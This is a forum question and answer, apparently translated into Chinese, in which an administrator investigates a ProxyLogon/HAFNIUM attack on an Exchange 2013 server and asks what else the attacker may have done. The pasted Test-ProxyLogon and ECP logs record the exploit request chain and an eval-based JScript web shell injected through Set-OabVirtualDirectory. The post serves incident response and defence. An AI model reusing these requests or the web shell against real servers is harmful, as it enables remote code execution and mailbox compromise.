上周,一台运行 Exchange Server 2013 的服务器受到了来自正在进行的 HAFNIUM 式攻击。
我们运行了Microsoft 提供的健康检查器脚本发现我们需要升级。我们升级到 Exchange Server 2013 CU23,并从 2021-03-04 中午左右开始应用所有补丁。除了需要手动重启前端传输服务外,升级成功。此后,相同的健康检查器脚本不再列出任何缺失的更新,并列出 KB500871 补丁。
我们还运行了Microsoft 提供的 Test-ProxyLogon.ps1 脚本,它生成了一个日志文件,其名称以 结尾,Cve-2021-26855.csv这只是涉及的四个 CVE 之一。提供了一些解释此日志文件的指导,但并不多,这就是我在这里的原因。
该文件列出了对 的各种探测autodiscover/autodiscover.xml,但也列出了对ecp/proxyLogon.ecp和 然后对各种DDI/DDIService.svc端点的一些探测,这似乎是令人担忧的部分。(补丁之后没有这样的活动。)以下是 .csv 文件显示的内容:
"2021-03-04T08:58:32.625Z","30b797e4-c47d-42a5-9367-511c90f92305","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","ExchangeServicesClient/0.0.0.0","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/autodiscover/autodiscover.xml?#","200"
"2021-03-04T08:58:33.969Z","44ebe2f7-47e4-468f-9f9a-47487faa7c95","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/mapi/emsmdb/?#","200"
"2021-03-04T08:58:37.031Z","3b0d1023-5972-477b-87e5-97936e34b120","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/ecp/proxyLogon.ecp?#","241"
"2021-03-04T08:58:51.547Z","56fc732f-d802-4d53-8960-0a39c3819e24","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory#","200"
"2021-03-04T08:59:07.344Z","7c2ee687-d1e5-45f1-8f03-7c99d46bb889","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=OABVirtualDirectory#","200"
"2021-03-04T08:59:08.876Z","35530698-2402-415c-9717-0cd61709225d","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=ResetOABVirtualDirectory#","200"
"2021-03-04T08:59:11.047Z","2f5e6b62-f04d-4850-8044-4c59d15fc1d3","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=OABVirtualDirectory#","200"
以下是服务器日志显示的内容%EXCHANGEPATH%\V15\Logging\ECP\Server:
2021-03-04T08:58:49.906Z,EXCHSRVNAME,ECP.Request,S:TIME=539;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-ActiveSyncVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:50.063Z,EXCHSRVNAME,ECP.Request,S:TIME=147;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-AutodiscoverVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:50.156Z,EXCHSRVNAME,ECP.Request,S:TIME=78;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-EcpVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:50.235Z,EXCHSRVNAME,ECP.Request,S:TIME=77;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-OabVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:50.438Z,EXCHSRVNAME,ECP.Request,S:TIME=201;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-OwaVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:50.516Z,EXCHSRVNAME,ECP.Request,S:TIME=67;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-WebServicesVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:50.610Z,EXCHSRVNAME,ECP.Request,S:TIME=80;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-PowershellVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:51.422Z,EXCHSRVNAME,ECP.Request,S:TIME=705;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Pipeline.1|Get-MailboxRegionalConfiguration;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:59:07.219Z,EXCHSRVNAME,ECP.Request,"S:TIME=14186;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Set-OabVirtualDirectory.ExternalUrl=''http://f/<script language=""JScript"" runat=""server"">function Page_Load(){eval(Request[""i3QynV""],""unsafe"");}</script>''.Identity=''bd09f9b0-53da-4a02-a729-7808ab410f06''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=OABVirtualDirectory;S:EX=;S:ACTID=7c2ee687-d1e5-45f1-8f03-7c99d46bb889;S:RS=0;S:BLD=15.0.1044.25"
2021-03-04T08:59:07.297Z,EXCHSRVNAME,ECP.Request,S:TIME=64;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Get-OabVirtualDirectory.ADPropertiesOnly=$true.Identity=''bd09f9b0-53da-4a02-a729-7808ab410f06''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=OABVirtualDirectory;S:EX=;S:ACTID=7c2ee687-d1e5-45f1-8f03-7c99d46bb889;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:59:10.547Z,EXCHSRVNAME,ECP.LongRunning,S:TIME=1650;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Get-OABVirtualDirectory.Identity=''bd09f9b0-53da-4a02-a729-7808ab410f06''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=ResetOABVirtualDirectory;S:EX=;S:ACTID=35530698-2402-415c-9717-0cd61709225d;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:59:10.938Z,EXCHSRVNAME,ECP.LongRunning,S:TIME=367;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Get-ExchangeServer.Identity=''EXCHSRVNAME''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=ResetOABVirtualDirectory;S:EX=;S:ACTID=35530698-2402-415c-9717-0cd61709225d;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:59:10.954Z,EXCHSRVNAME,ECP.Request,S:TIME=692;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Set-OabVirtualDirectory.ExternalUrl=$null.Identity=''bd09f9b0-53da-4a02-a729-7808ab410f06''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=OABVirtualDirectory;S:EX=;S:ACTID=2f5e6b62-f04d-4850-8044-4c59d15fc1d3;S:RS=0;S:BLD=15.0.1044.25
2021-03-04T08:59:11.016Z,EXCHSRVNAME,ECP.Request,S:TIME=60;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Get-OabVirtualDirectory.ADPropertiesOnly=$true.Identity=''bd09f9b0-53da-4a02-a729-7808ab410f06''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=OABVirtualDirectory;S:EX=;S:ACTID=2f5e6b62-f04d-4850-8044-4c59d15fc1d3;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:59:14.579Z,EXCHSRVNAME,ECP.LongRunning,S:TIME=3641;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Remove-OABVirtualDirectory.Force=$true.Identity=''EXCHSRVNAME\OAB (Default Web Site)''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=ResetOABVirtualDirectory;S:EX=;S:ACTID=35530698-2402-415c-9717-0cd61709225d;S:RS=0;S:BLD=15.0.1044.25
2021-03-04T08:59:23.391Z,EXCHSRVNAME,ECP.LongRunning,S:TIME=8804;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=New-OABVirtualDirectory.WebSiteName=''Default Web Site''.Server=''EXCHSRVNAME''.Role=''ClientAccess''.InternalURL=''https://EXCHSRVNAME.redacted.domain/OAB''.Path=''C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\OAB''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=ResetOABVirtualDirectory;S:EX=;S:ACTID=35530698-2402-415c-9717-0cd61709225d;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:59:23.454Z,EXCHSRVNAME,ECP.LongRunning,S:TIME=59;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Get-OabVirtualDirectory.ADPropertiesOnly=$true.Identity=''EXCHSRVNAME\OAB (Default Web Site)''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=ResetOABVirtualDirectory;S:EX=;S:ACTID=35530698-2402-415c-9717-0cd61709225d;S:RS=1;S:BLD=15.0.1044.25
据我所知,这注入并暴露了一个 Web Shell。但是 - 根据 ESET Mail Security(防病毒软件)中的日志,有问题的文件(名为RedirSuiteServerProxy.aspx)在w3wp.exe(IIS)试图检索它时被拦截,并由于是已知的“JS/Exploit.CVE-2021-26855.Webshell.A 木马”而被删除。该文件的名称也没有出现在任何 IIS 访问日志中。与这些请求关联的 IP 地址(匿名为666.666.666.666)确实出现了,但只有与这些请求直接对应的行,而不是其他表明实际访问和使用 Web Shell 的内容。
我已经运行了最近更新的MSERT/Microsoft 安全扫描程序 1.0.3001.0,其全面扫描显示没有任何问题。除此之外,我还检查了其他三个漏洞可能发布的已知事件日志事件,但我或前面提到的检查它们的脚本都找不到它们。我仔细检查了没有出现新用户或组,或者现有用户被移动到本地或域内的特权组。我还检查了 Microsoft 页面上详细说明的其他各种迹象,例如新创建的 .aspx 文件、C:\ProgramData\ 中用于泄露的 .zip/.rar/.7z 文件等等。
考虑到所有这些,我的问题是:除了创建 Web shell(杀毒软件立即阻止其使用)之外,这次攻击还做了其他什么吗?没有其他 CVE 的迹象是否意味着它从未升级到这些步骤?还有什么事情需要调查吗?
答案1
根据我的研究,这些漏洞被用作攻击链的一部分。初始攻击需要能够与 Exchange 服务器端口 443 建立不受信任的连接。立即修补 Exchange 服务器是最好的第一步。其他临时选项包括通过限制不受信任的连接或通过设置 VPN 将 Exchange 服务器与外部访问隔离开来提供保护。使用此缓解措施只能防止攻击的初始部分;如果攻击者已经拥有访问权限或可以说服管理员运行恶意文件,则可以触发攻击链的其他部分。
此次安全更新版本修复了影响 Exchange Server 的七个安全漏洞。其中四个漏洞已知曾被用于针对本地 Exchange 服务器的有限、有针对性的攻击。
此外,博客Webshell 攻击持续增加可能对你有帮助。